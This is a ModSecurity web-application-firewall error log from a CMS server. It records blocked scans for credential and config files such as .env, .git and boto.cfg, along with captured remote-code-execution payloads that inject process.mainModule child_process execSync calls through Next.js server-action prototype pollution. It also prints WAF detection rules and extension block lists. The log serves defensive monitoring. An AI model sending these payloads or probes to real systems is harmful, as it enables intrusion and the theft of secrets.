[tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "abVJpUrfWvuO4-1gRsxD9QAAAE4"] [Sat Mar 14 13:42:41.531954 2026] [:error] [pid 14273:tid 14349] [client 185.177.72.56:45210] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/s3.key"] [unique_id "abVJsf2clTdPByjeT_M3LQAAAJU"] [Sat Mar 14 13:42:44.246154 2026] [:error] [pid 4409:tid 4424] [client 185.177.72.56:45310] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/etc/boto.cfg"] [unique_id "abVJtODqGyPowfV1U2bbbQAAAY0"] [Sat Mar 14 13:43:10.587245 2026] [:error] [pid 4409:tid 4433] [client 185.177.72.56:44450] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.git/config.bak"] [unique_id "abVJzuDqGyPowfV1U2bcHgAAAZY"] [Sat Mar 14 13:43:10.624456 2026] [:error] [pid 4409:tid 4415] [client 185.177.72.56:44450] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.git/config.old"] [unique_id "abVJzuDqGyPowfV1U2bcHwAAAYQ"] [Sat Mar 14 13:43:14.923450 2026] [:error] [pid 4409:tid 4413] [client 185.177.72.56:44556] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "abVJ0uDqGyPowfV1U2bcOQAAAYI"] [Sat Mar 14 13:43:15.620719 2026] [:error] [pid 14273:tid 14349] [client 185.177.72.56:44572] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "abVJ0_2clTdPByjeT_M4hgAAAJU"] [Sat Mar 14 13:43:16.236019 2026] [:error] [pid 14273:tid 14343] [client 185.177.72.56:44592] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS_NAMES:*update*. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms-1.dev-unit.com"] [uri "/package-updates/*"] [unique_id "abVJ1P2clTdPByjeT_M4jwAAAJI"] [Sat Mar 14 13:43:55.278589 2026] [autoindex:error] [pid 4409:tid 4431] [client 185.177.72.56:52726] AH01276: Cannot serve directory /usr/local/apache/autossl_tmp/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Mar 15 15:55:45.162971 2026] [:error] [pid 28030:tid 28110] [client 85.11.167.19:33970] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1773582963_277',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1773582963_277'..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aba6YcAU32XwayqsA41jEgAAABQ"], referer: https://cms-1.dev-unit.com [Sun Mar 15 15:55:45.255821 2026] [:error] [pid 28208:tid 28220] [client 85.11.167.19:33986] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1773582968',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1773582968',{'timeo..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aba6YUdCuh2U9WVS8spDuAAAAMk"], referer: https://cms-1.dev-unit.com [Mon Mar 16 13:34:58.028008 2026] [:error] [pid 13194:tid 13792] [client 194.180.48.253:54970] [client 194.180.48.253] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-20239"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "abfq4mjV2nmsjJfhM7NuUAAAAAA"] [Mon Mar 16 21:10:16.786178 2026] [:error] [pid 15336:tid 15369] [client 3.111.42.203:47318] [client 3.111.42.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abhVmKQt2w0-VouOZpO5UAAAAUQ"] [Mon Mar 16 21:10:16.925479 2026] [:error] [pid 15336:tid 15363] [client 3.111.42.203:47318] [client 3.111.42.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abhVmKQt2w0-VouOZpO5UgAAAUA"] [Mon Mar 16 21:10:17.074897 2026] [:error] [pid 15336:tid 15386] [client 3.111.42.203:47318] [client 3.111.42.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abhVmaQt2w0-VouOZpO5UwAAAVU"] [Mon Mar 16 22:13:06.505389 2026] [:error] [pid 13194:tid 13796] [client 16.171.45.76:49442] [client 16.171.45.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abhkUmjV2nmsjJfhM7NEyQAAAAQ"] [Mon Mar 16 22:13:06.548034 2026] [:error] [pid 13194:tid 13806] [client 16.171.45.76:49442] [client 16.171.45.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abhkUmjV2nmsjJfhM7NEywAAAA4"] [Mon Mar 16 22:13:06.599552 2026] [:error] [pid 13194:tid 13802] [client 16.171.45.76:49442] [client 16.171.45.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "abhkUmjV2nmsjJfhM7NEzgAAAAo"] [Tue Mar 17 17:40:14.046472 2026] [:error] [pid 23895:tid 23980] [client 85.11.167.19:34402] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1773762033_7801',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1773762033_780..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "abl13ra3UU-pgWx4MGSIAAAAAQs"], referer: https://cms-1.dev-unit.com [Fri Mar 20 05:53:39.347696 2026] [:error] [pid 17713:tid 17801] [client 104.23.239.93:14161] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/HEAD"] [unique_id "abzEw-WNdVzdR4d4e6ZMyQAAAQs"] [Fri Mar 20 05:53:39.347701 2026] [:error] [pid 17713:tid 17805] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "abzEw-WNdVzdR4d4e6ZMyAAAAQ8"] [Fri Mar 20 05:53:39.347703 2026] [:error] [pid 26363:tid 26399] [client 104.23.239.54:11495] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/logs/HEAD"] [unique_id "abzEw94YyF1e-QDujo_qRwAAAUI"] [Fri Mar 20 05:53:39.347782 2026] [:error] [pid 26363:tid 26412] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/refs/heads/master"] [unique_id "abzEw94YyF1e-QDujo_qSAAAAU8"] [Fri Mar 20 05:53:39.347877 2026] [:error] [pid 17713:tid 17793] [client 104.23.239.92:12546] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/refs/heads/main"] [unique_id "abzEw-WNdVzdR4d4e6ZMxwAAAQM"] [Fri Mar 20 05:53:39.347917 2026] [:error] [pid 17713:tid 17790] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/index"] [unique_id "abzEw-WNdVzdR4d4e6ZMygAAAQA"] [Fri Mar 20 05:53:39.359124 2026] [:error] [pid 17713:tid 17806] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env"] 